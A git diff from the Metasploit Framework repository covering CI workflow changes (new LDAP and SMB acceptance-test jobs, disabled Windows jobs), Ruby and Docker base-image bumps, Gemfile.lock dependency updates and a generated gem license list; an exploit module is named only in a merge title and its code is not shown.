Land #19227 , Moodle::Login.moodle_login: fix login success verification regex

automatic module_metadata_base.json update
Land #19208 , Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE
2024-06-05 17:12:11 +01:00 · 2024-06-05 03:42:42 -05:00 · 2024-06-05 10:17:02 +02:00 · 2024-06-05 10:14:48 +02:00 · 2024-06-03 13:19:21 +01:00 · 2024-06-03 11:09:59 +01:00
376 changed files with 21640 additions and 3247 deletions
@@ -53,7 +53,8 @@ jobs:
      matrix:
        os:
          - macos-11
-          - windows-2019
+          # Temporarily disabled for failing pcaprub compilation:
+          # - windows-2019
          - ubuntu-20.04
        ruby:
          - 3.0.2
@@ -71,8 +72,9 @@ jobs:
          # - { name: php, runtime_version: 8.2 }
        include:
          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+          # Temporarily disabled for failing pcaprub compilation:
+          # - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          # - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }

          # Mettle
          - { meterpreter: { name: mettle }, os: macos-11 }
@@ -0,0 +1,164 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**ldap**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  ldap:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+
+    name: LDAP Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run samba/ldap docker container
+        working-directory: 'test/ldap'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development pcap"
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: latest
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/ldap_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: ldap-acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - ldap
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -0,0 +1,166 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - '**/**smb**'
+      - 'spec/acceptance/**'
+      - 'spec/support/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  smb:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - '3.2'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+      SMB_USERNAME: acceptance_tests_user
+      SMB_PASSWORD: acceptance_tests_password
+
+    name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Run docker container
+        working-directory: 'test/smb'
+        run: |
+          docker compose build
+          docker compose up --wait -d
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development pcap"
+          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
+          BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+          RUNTIME_VERSION: 'latest'
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/smb_spec.rb
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: smb_acceptance-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs:
+      - smb
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v4
+        if: always()
+
+      - name: Install system dependencies (Linux)
+        if: always()
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - name: Setup Ruby
+        if: always()
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: '${{ matrix.ruby }}'
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - uses: actions/download-artifact@v4
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ls -la ${{steps.download.outputs.download-path}}
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+          find ${{steps.download.outputs.download-path}}
+          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -64,10 +64,9 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
          - '3.1'
          - '3.2'
-          - '3.3.0-preview3'
+          - '3.3'
        os:
          - ubuntu-20.04
          - ubuntu-latest
@@ -1 +1 @@
-3.0.5
+3.1.5
@@ -1,4 +1,4 @@
-FROM ruby:3.1.4-alpine3.18 AS builder
+FROM ruby:3.1.5-alpine3.18 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_CONFIG_ARGS="set no-cache 'true' set system 'true' set without 'development test coverage'"
@@ -53,7 +53,7 @@ RUN mkdir -p $TOOLS_HOME/bin && \
    cd go/src && \
    ./make.bash

-FROM ruby:3.1.4-alpine3.18
+FROM ruby:3.1.5-alpine3.18
 LABEL maintainer="Rapid7"
 ARG TARGETARCH

@@ -1,7 +1,8 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.3)
+    metasploit-framework (6.4.12)
+      aarch64
      actionpack (~> 7.0.0)
      activerecord (~> 7.0.0)
      activesupport (~> 7.0.0)
@@ -20,7 +21,7 @@ PATH
      em-http-request
      eventmachine
      faker
-      faraday
+      faraday (= 2.7.11)
      faraday-retry
      faye-websocket
      filesize
@@ -45,7 +46,7 @@ PATH
      net-ssh
      network_interface
      nexpose
-      nokogiri (~> 1.14.0)
+      nokogiri
      octokit (~> 4.0)
      openssl-ccm
      openvas-omp
@@ -85,7 +86,7 @@ PATH
      rubyntlm
      rubyzip
      sinatra
-      sqlite3
+      sqlite3 (= 1.7.3)
      sshkey
      swagger-blocks
      thin
@@ -103,37 +104,39 @@ PATH
 GEM
  remote: https://rubygems.org/
  specs:
-    Ascii85 (1.1.0)
-    actionpack (7.0.8)
-      actionview (= 7.0.8)
-      activesupport (= 7.0.8)
+    Ascii85 (1.1.1)
+    aarch64 (2.1.0)
+      racc (~> 1.6)
+    actionpack (7.0.8.1)
+      actionview (= 7.0.8.1)
+      activesupport (= 7.0.8.1)
      rack (~> 2.0, >= 2.2.4)
      rack-test (>= 0.6.3)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.2.0)
-    actionview (7.0.8)
-      activesupport (= 7.0.8)
+    actionview (7.0.8.1)
+      activesupport (= 7.0.8.1)
      builder (~> 3.1)
      erubi (~> 1.4)
      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.1, >= 1.2.0)
-    activemodel (7.0.8)
-      activesupport (= 7.0.8)
-    activerecord (7.0.8)
-      activemodel (= 7.0.8)
-      activesupport (= 7.0.8)
-    activesupport (7.0.8)
+    activemodel (7.0.8.1)
+      activesupport (= 7.0.8.1)
+    activerecord (7.0.8.1)
+      activemodel (= 7.0.8.1)
+      activesupport (= 7.0.8.1)
+    activesupport (7.0.8.1)
      concurrent-ruby (~> 1.0, >= 1.0.2)
      i18n (>= 1.6, < 2)
      minitest (>= 5.1)
      tzinfo (~> 2.0)
-    addressable (2.8.5)
+    addressable (2.8.6)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
-    allure-rspec (2.23.0)
-      allure-ruby-commons (= 2.23.0)
+    allure-rspec (2.24.3)
+      allure-ruby-commons (= 2.24.3)
      rspec-core (>= 3.8, < 4)
-    allure-ruby-commons (2.23.0)
+    allure-ruby-commons (2.24.3)
      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
@@ -141,59 +144,59 @@ GEM
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
-    aws-eventstream (1.2.0)
-    aws-partitions (1.834.0)
-    aws-sdk-core (3.185.1)
-      aws-eventstream (~> 1, >= 1.0.2)
+    aws-eventstream (1.3.0)
+    aws-partitions (1.933.0)
+    aws-sdk-core (3.196.1)
+      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.651.0)
-      aws-sigv4 (~> 1.5)
+      aws-sigv4 (~> 1.8)
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.411.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2 (1.457.1)
+      aws-sdk-core (~> 3, >= 3.193.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-ec2instanceconnect (1.34.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-ec2instanceconnect (1.40.0)
+      aws-sdk-core (~> 3, >= 3.193.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.87.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-iam (1.98.0)
+      aws-sdk-core (~> 3, >= 3.193.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.72.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+    aws-sdk-kms (1.82.0)
+      aws-sdk-core (~> 3, >= 3.193.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.136.0)
-      aws-sdk-core (~> 3, >= 3.181.0)
+    aws-sdk-s3 (1.151.0)
+      aws-sdk-core (~> 3, >= 3.194.0)
      aws-sdk-kms (~> 1)
-      aws-sigv4 (~> 1.6)
-    aws-sdk-ssm (1.158.0)
-      aws-sdk-core (~> 3, >= 3.184.0)
+      aws-sigv4 (~> 1.8)
+    aws-sdk-ssm (1.169.0)
+      aws-sdk-core (~> 3, >= 3.193.0)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.6.0)
+    aws-sigv4 (1.8.0)
      aws-eventstream (~> 1, >= 1.0.2)
-    base64 (0.1.1)
-    bcrypt (3.1.19)
-    bcrypt_pbkdf (1.1.0)
+    base64 (0.2.0)
+    bcrypt (3.1.20)
+    bcrypt_pbkdf (1.1.1)
+    bigdecimal (3.1.8)
    bindata (2.4.15)
-    bootsnap (1.16.0)
+    bootsnap (1.18.3)
      msgpack (~> 1.2)
-    bson (4.15.0)
+    bson (5.0.0)
    builder (3.2.4)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    cookiejar (0.3.3)
+    concurrent-ruby (1.2.3)
+    cookiejar (0.3.4)
    crass (1.0.6)
    daemons (1.4.1)
-    date (3.3.3)
+    date (3.3.4)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
    diff-lcs (1.5.1)
-    dnsruby (1.70.0)
+    dnsruby (1.72.1)
      simpleidn (~> 0.2.1)
    docile (1.4.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    domain_name (0.6.20240107)
    ed25519 (1.3.0)
    em-http-request (1.1.7)
      addressable (>= 2.3.4)
@@ -205,19 +208,19 @@ GEM
      eventmachine (>= 1.0.0.beta.4)
    erubi (1.12.0)
    eventmachine (1.2.7)
-    factory_bot (6.2.1)
+    factory_bot (6.4.6)
      activesupport (>= 5.0.0)
-    factory_bot_rails (6.2.0)
-      factory_bot (~> 6.2.0)
+    factory_bot_rails (6.4.3)
+      factory_bot (~> 6.4)
      railties (>= 5.0.0)
-    faker (3.2.1)
+    faker (3.3.1)
      i18n (>= 1.8.11, < 2)
    faraday (2.7.11)
      base64
      faraday-net_http (>= 2.0, < 3.1)
      ruby2_keywords (>= 0.0.4)
    faraday-net_http (3.0.2)
-    faraday-retry (2.2.0)
+    faraday-retry (2.2.1)
      faraday (~> 2.0)
    faye-websocket (0.11.3)
      eventmachine (>= 0.12.0)
@@ -239,21 +242,21 @@ GEM
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
    httpclient (2.8.3)
-    i18n (1.14.1)
+    i18n (1.14.4)
      concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
+    io-console (0.7.2)
    irb (1.7.4)
      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.6.3)
+    json (2.7.2)
    language_server-protocol (3.17.0.3)
    little-plugger (1.1.4)
    logging (2.3.1)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.21.3)
+    loofah (2.22.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
    macaddr (1.7.2)
@@ -265,7 +268,7 @@ GEM
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.7)
+    metasploit-credential (6.0.9)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -291,34 +294,35 @@ GEM
      recog
      webrick
    metasploit_payloads-mettle (1.0.26)
-    method_source (1.0.0)
-    mime-types (3.5.1)
+    method_source (1.1.0)
+    mime-types (3.5.2)
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.1003)
-    mini_portile2 (2.8.4)
-    minitest (5.20.0)
+    mime-types-data (3.2024.0305)
+    mini_portile2 (2.8.6)
+    minitest (5.22.3)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-imap (0.4.0)
+    net-imap (0.4.11)
      date
      net-protocol
-    net-ldap (0.18.0)
-    net-protocol (0.2.1)
+    net-ldap (0.19.0)
+    net-protocol (0.2.2)
      timeout
-    net-smtp (0.4.0)
+    net-smtp (0.5.0)
      net-protocol
-    net-ssh (7.2.0)
+    net-ssh (7.2.3)
    network_interface (0.0.4)
    nexpose (7.3.0)
-    nio4r (2.5.9)
-    nokogiri (1.14.5)
-      mini_portile2 (~> 2.8.0)
+    nio4r (2.7.3)
+    nokogiri (1.16.5)
+      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
-    nori (2.6.0)
+    nori (2.7.0)
+      bigdecimal
    octokit (4.25.1)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
@@ -327,31 +331,32 @@ GEM
    openvas-omp (0.0.4)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
-    parallel (1.23.0)
-    parser (3.2.2.4)
+    parallel (1.24.0)
+    parser (3.3.0.5)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
-    pcaprub (0.13.1)
-    pdf-reader (2.11.0)
+    pcaprub (0.13.2)
+    pdf-reader (2.12.0)
      Ascii85 (~> 1.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (1.5.4)
+    pg (1.5.6)
    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.3)
-    puma (6.4.0)
+    public_suffix (5.0.5)
+    puma (6.4.2)
      nio4r (~> 2.0)
-    racc (1.7.1)
-    rack (2.2.8)
-    rack-protection (3.1.0)
+    racc (1.8.0)
+    rack (2.2.9)
+    rack-protection (3.2.0)
+      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
    rack-test (2.1.0)
      rack (>= 1.3)
@@ -362,23 +367,23 @@ GEM
    rails-html-sanitizer (1.6.0)
      loofah (~> 2.21)
      nokogiri (~> 1.14)
-    railties (7.0.8)
-      actionpack (= 7.0.8)
-      activesupport (= 7.0.8)
+    railties (7.0.8.1)
+      actionpack (= 7.0.8.1)
+      activesupport (= 7.0.8.1)
      method_source
      rake (>= 12.2)
      thor (~> 1.0)
      zeitwerk (~> 2.5)
    rainbow (3.1.1)
-    rake (13.0.6)
-    rasn1 (0.12.1)
+    rake (13.2.1)
+    rasn1 (0.13.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.2)
+    recog (3.1.5)
      nokogiri
    redcarpet (3.6.0)
-    regexp_parser (2.8.1)
-    reline (0.4.1)
+    regexp_parser (2.9.0)
+    reline (0.5.2)
      io-console (~> 0.5)
    require_all (3.0.0)
    rex-arch (0.1.15)
@@ -389,7 +394,7 @@ GEM
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.31)
+    rex-core (0.1.32)
    rex-encoder (0.1.7)
      metasm
      rex-arch
@@ -412,7 +417,7 @@ GEM
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.11)
+    rex-random_identifier (0.1.12)
      rex-text
    rex-registry (0.1.5)
    rex-rop_builder (0.1.5)
@@ -426,10 +431,11 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.4)
-    rex-text (0.2.57)
+    rex-text (0.2.58)
    rex-zip (0.1.5)
      rex-text
-    rexml (3.2.6)
+    rexml (3.2.8)
+      strscan (>= 3.0.9)
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
@@ -443,38 +449,37 @@ GEM
    rspec-mocks (3.13.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (6.0.3)
+    rspec-rails (6.1.2)
      actionpack (>= 6.1)
      activesupport (>= 6.1)
      railties (>= 6.1)
-      rspec-core (~> 3.12)
-      rspec-expectations (~> 3.12)
-      rspec-mocks (~> 3.12)
-      rspec-support (~> 3.12)
+      rspec-core (~> 3.13)
+      rspec-expectations (~> 3.13)
+      rspec-mocks (~> 3.13)
+      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.0)
-    rubocop (1.56.4)
-      base64 (~> 0.1.1)
+    rspec-support (3.13.1)
+    rubocop (1.63.2)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
      parallel (~> 1.10)
-      parser (>= 3.2.2.3)
+      parser (>= 3.3.0.2)
      rainbow (>= 2.2.2, < 4.0)
      regexp_parser (>= 1.8, < 3.0)
      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.1, < 2.0)
+      rubocop-ast (>= 1.31.1, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.29.0)
-      parser (>= 3.2.1.0)
-    ruby-macho (4.0.0)
+    rubocop-ast (1.31.2)
+      parser (>= 3.3.0.4)
+    ruby-macho (4.0.1)
    ruby-mysql (4.1.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.4)
+    ruby_smb (3.3.8)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -489,36 +494,34 @@ GEM
      docile (~> 1.1)
      simplecov-html (~> 0.11)
    simplecov-html (0.12.3)
-    simpleidn (0.2.1)
-      unf (~> 0.1.4)
-    sinatra (3.1.0)
+    simpleidn (0.2.3)
+    sinatra (3.2.0)
      mustermann (~> 3.0)
      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.1.0)
+      rack-protection (= 3.2.0)
      tilt (~> 2.0)
-    sqlite3 (1.6.6)
+    sqlite3 (1.7.3)
      mini_portile2 (~> 2.8.0)
    sshkey (3.0.0)
    strptime (0.2.5)
+    strscan (3.1.0)
    swagger-blocks (3.0.0)
    systemu (2.6.5)
-    test-prof (1.2.3)
+    test-prof (1.3.2)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (1.2.2)
+    thor (1.3.1)
    tilt (2.3.0)
    timecop (0.9.8)
-    timeout (0.4.0)
-    ttfunk (1.7.0)
+    timeout (0.4.1)
+    ttfunk (1.8.0)
+      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2023.3)
+    tzinfo-data (1.2024.1)
      tzinfo (>= 1.0.0)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
    unicode-display_width (2.5.0)
    unix-crypt (1.3.1)
    uuid (2.3.9)
@@ -546,7 +549,7 @@ GEM
    xmlrpc (0.3.3)
      webrick
    yard (0.9.36)
-    zeitwerk (2.6.12)
+    zeitwerk (2.6.13)

 PLATFORMS
  ruby
@@ -1,58 +1,59 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.0, MIT
-actionpack, 7.0.8, MIT
-actionview, 7.0.8, MIT
-activemodel, 7.0.8, MIT
-activerecord, 7.0.8, MIT
-activesupport, 7.0.8, MIT
-addressable, 2.8.5, "Apache 2.0"
+Ascii85, 1.1.1, MIT
+actionpack, 7.0.8.1, MIT
+actionview, 7.0.8.1, MIT
+activemodel, 7.0.8.1, MIT
+activerecord, 7.0.8.1, MIT
+activesupport, 7.0.8.1, MIT
+addressable, 2.8.6, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.23.0, "Apache 2.0"
-allure-ruby-commons, 2.23.0, "Apache 2.0"
+allure-rspec, 2.24.3, "Apache 2.0"
+allure-ruby-commons, 2.24.3, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.834.0, "Apache 2.0"
-aws-sdk-core, 3.185.1, "Apache 2.0"
-aws-sdk-ec2, 1.411.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
-aws-sdk-iam, 1.87.0, "Apache 2.0"
-aws-sdk-kms, 1.72.0, "Apache 2.0"
-aws-sdk-s3, 1.136.0, "Apache 2.0"
-aws-sdk-ssm, 1.158.0, "Apache 2.0"
-aws-sigv4, 1.6.0, "Apache 2.0"
-base64, 0.1.1, "ruby, Simplified BSD"
-bcrypt, 3.1.19, MIT
-bcrypt_pbkdf, 1.1.0, MIT
+aws-eventstream, 1.3.0, "Apache 2.0"
+aws-partitions, 1.933.0, "Apache 2.0"
+aws-sdk-core, 3.196.1, "Apache 2.0"
+aws-sdk-ec2, 1.457.1, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.40.0, "Apache 2.0"
+aws-sdk-iam, 1.98.0, "Apache 2.0"
+aws-sdk-kms, 1.82.0, "Apache 2.0"
+aws-sdk-s3, 1.151.0, "Apache 2.0"
+aws-sdk-ssm, 1.169.0, "Apache 2.0"
+aws-sigv4, 1.8.0, "Apache 2.0"
+base64, 0.2.0, "ruby, Simplified BSD"
+bcrypt, 3.1.20, MIT
+bcrypt_pbkdf, 1.1.1, MIT
+bigdecimal, 3.1.8, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
-bootsnap, 1.16.0, MIT
-bson, 4.15.0, "Apache 2.0"
+bootsnap, 1.18.3, MIT
+bson, 5.0.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.2.2, MIT
-cookiejar, 0.3.3, unknown
+concurrent-ruby, 1.2.3, MIT
+cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-date, 3.3.3, "ruby, Simplified BSD"
+date, 3.3.4, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.70.0, "Apache 2.0"
